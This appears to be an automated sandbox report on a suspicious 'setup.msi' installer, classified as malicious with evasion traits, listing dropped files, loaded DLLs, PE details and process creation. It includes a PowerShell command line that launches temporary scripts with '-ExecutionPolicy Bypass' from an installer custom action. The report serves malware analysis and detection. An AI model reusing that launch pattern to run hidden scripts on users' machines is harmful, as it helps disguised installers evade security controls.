Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{C7E6E451-02A3-4DC3-B2F7-C5FDB39DC91C}Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID0FF.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\49b9da.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\49b9da.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIBD13.tmpJump to behavior
Source: Qt5Network.dll.1.drStatic PE information: Number of sections : 12 > 10
Source: Qt5Svg.dll.1.drStatic PE information: Number of sections : 12 > 10
Source: Qt5Widgets.dll.1.drStatic PE information: Number of sections : 12 > 10
Source: Qt5Core.dll.1.drStatic PE information: Number of sections : 13 > 10
Source: Qt5Gui.dll.1.drStatic PE information: Number of sections : 12 > 10
Source: axvlc.dll.1.drStatic PE information: Number of sections : 14 > 10
Source: libssl-1_1.dll.1.drStatic PE information: Number of sections : 11 > 10
Source: api-ms-win-core-handle-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-2-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: Microsoft.VisualBasic.Core.dll.1.drStatic PE information: No import functions for PE file found
Source: Microsoft.CSharp.dll.1.drStatic PE information: No import functions for PE file found
Source: clretwrc.dll.1.drStatic PE information: No import functions for PE file found
Source: setup.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs setup.msi
Source: setup.msiBinary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs setup.msi
Source: Qt5Core.dll.1.drStatic PE information: Section: /4 ZLIB complexity 0.9890509136652542
Source: classification engineClassification label: mal52.evad.winMSI@7/116@1/1
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CMLD195.tmpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF490A6790C1A4D0F9.TMPJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\setup.msi"
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 76F054D823F7B346F706921024C133C7
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 76F054D823F7B346F706921024C133C7Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: setup.msiStatic file information: File size 25227264 > 1048576
Source: Binary string: CorSymReader.pdb source: Microsoft.DiaSymReader.Native.amd64.dll.1.dr
Source: Binary string: Microsoft.CSharp.ni.pdb source: Microsoft.CSharp.dll.1.dr
Source: Binary string: D:\a\audacity\audacity\.build.x64\RelWithDebInfo\lib-command-parameters.pdb source: lib-command-parameters.dll.1.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source: Binary string: `OTHER`TEMP`PACKED<%s return value>internal error: failed to write debug data to pdb streaminternal error: failed to add section contributioninternal warning: PDB Error string is "%S"internal error: failed to close debug infointernal error: failed to close PDBinternal error: failed to open PDB for writing in streaminternal error: failed to create debug info in PDBinternal error: failed to add code section to debug infointernal error: failed to add module to debug infointernal error: failed to create type info in PDBinternal error: failed to create inline type info in PDBinternal error: failed to create source file store in PDBinternal error: failed to close source file store in PDBinternal error: failed to close module in debug infointernal error: failed to commit type info in PDBinternal error: failed to commit inline type info in PDBinternal error: failed to add section header to debug infointernal error: failed to append section header to pdbinternal error: failed to close section header in debug infointernal error: failed to close debug info in PDBinternal error: failed to commit PDBinternal error: PDB data too largeinternal error: PDB stream truncatedinternal error: failed to close source file storeinternal error: failed to close type infointernal error: pdb append failedfxl_4_0too many arguments to target TXtoo many outputs to target TXclip not supported in texture shadersinvalid reference to input semantic '%s%d'invalid reference to output semantic '%s%d'0123456789abcdef.pdbVPosSV_ViewportArrayIndexColorFailed to log error, redirecting to debug output: source: D3DCompiler_47_cor3.dll.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdbk source: setup.msi
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\jit\clrjit.pdb source: clrjit.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
Source: Binary string: SymBinderBothSymReader.diaDia based SymReaderPdb based SymWriterCorSymWriter.pdbPdb based CorSymWriterCorSymReader.pdbPdb based CorSymReaderCorSymBinderNDP SymBinderCorSymWriterNDP SymWriterCorSymReaderNDP SymReader source: Microsoft.DiaSymReader.Native.amd64.dll.1.dr
Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\Microsoft.DiaSymReader.Native.amd64.pdb source: Microsoft.DiaSymReader.Native.amd64.dll.1.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: setup.msi
Source: Binary string: D3DCompiler_47.pdb source: D3DCompiler_47_cor3.dll.1.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: api-ms-win-core-console-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: api-ms-win-core-file-l1-1-0.dll.1.dr
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.CSharp\net6.0-windows-Release\Microsoft.CSharp.pdb source: Microsoft.CSharp.dll.1.dr
Source: Binary string: CorSymWriter.pdb source: Microsoft.DiaSymReader.Native.amd64.dll.1.dr
Source: Binary string: D3DCompiler_47.pdbGCTL source: D3DCompiler_47_cor3.dll.1.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: setup.msi, MSIC0B1.tmp.1.dr, MSIBF76.tmp.1.dr, MSIBD13.tmp.1.dr
Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\Microsoft.DiaSymReader.Native.amd64.pdbn source: Microsoft.DiaSymReader.Native.amd64.dll.1.dr
Source: D3DCompiler_47_cor3.dll.1.drStatic PE information: 0x831FAD3B [Sat Sep 17 16:54:19 2039 UTC]
Source: libsodium-23.dll.1.drStatic PE information: section name: /4
Source: libssl-1_1.dll.1.drStatic PE information: section name: /4
Source: libstdc++-6.dll.1.drStatic PE information: section name: /4
Source: libicuin68.dll.1.drStatic PE information: section name: /4
Source: Qt5Core.dll.1.drStatic PE information: section name: /4
Source: Qt5Core.dll.1.drStatic PE information: section name: /20
Source: Qt5Core.dll.1.drStatic PE information: section name: /30
Source: Qt5Gui.dll.1.drStatic PE information: section name: /4
Source: Qt5Gui.dll.1.drStatic PE information: section name: /14
Source: Qt5Network.dll.1.drStatic PE information: section name: /4
Source: Qt5Network.dll.1.drStatic PE information: section name: /14
Source: Qt5Svg.dll.1.drStatic PE information: section name: /4
Source: Qt5Svg.dll.1.drStatic PE information: section name: /14
Source: Qt5Widgets.dll.1.drStatic PE information: section name: /4
Source: Qt5Widgets.dll.1.drStatic PE information: section name: /14
Source: clrjit.dll.1.drStatic PE information: section name: _RDATA
Source: coreclr.dll.1.drStatic PE information: section name: .CLR_UEF
Source: coreclr.dll.1.drStatic PE information: section name: .didat
Source: coreclr.dll.1.drStatic PE information: section name: Section
Source: coreclr.dll.1.drStatic PE information: section name: _RDATA
Source: UnRAR.exe.1.drStatic PE information: section name: _RDATA
Source: vstdlib_s.dll.1.drStatic PE information: section name: .code
Source: lib-audio-io.dll.1.drStatic PE information: section name: .00cfg
Source: lib-basic-ui.dll.1.drStatic PE information: section name: .00cfg
Source: lib-channel.dll.1.drStatic PE information: section name: .00cfg
Source: lib-cloud-audiocom.dll.1.drStatic PE information: section name: .00cfg
Source: lib-command-parameters.dll.1.drStatic PE information: section name: .00cfg
Source: Microsoft.DiaSymReader.Native.amd64.dll.1.drStatic PE information: section name: .didat
Source: Microsoft.DiaSymReader.Native.amd64.dll.1.drStatic PE information: section name: _RDATA
Source: axvlc.dll.1.drStatic PE information: section name: .buildid
Source: axvlc.dll.1.drStatic PE information: section name: .xdata
Source: axvlc.dll.1.drStatic PE information: section name: /4
Source: libicuuc68.dll.1.drStatic PE information: section name: /4
Source: libreadline8.dll.1.drStatic PE information: section name: /4
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\lib-command-parameters.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\UnRAR.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\libicuin68.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\libsodium-23.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Microsoft.DiaSymReader.Native.amd64.dllJump to dropped file
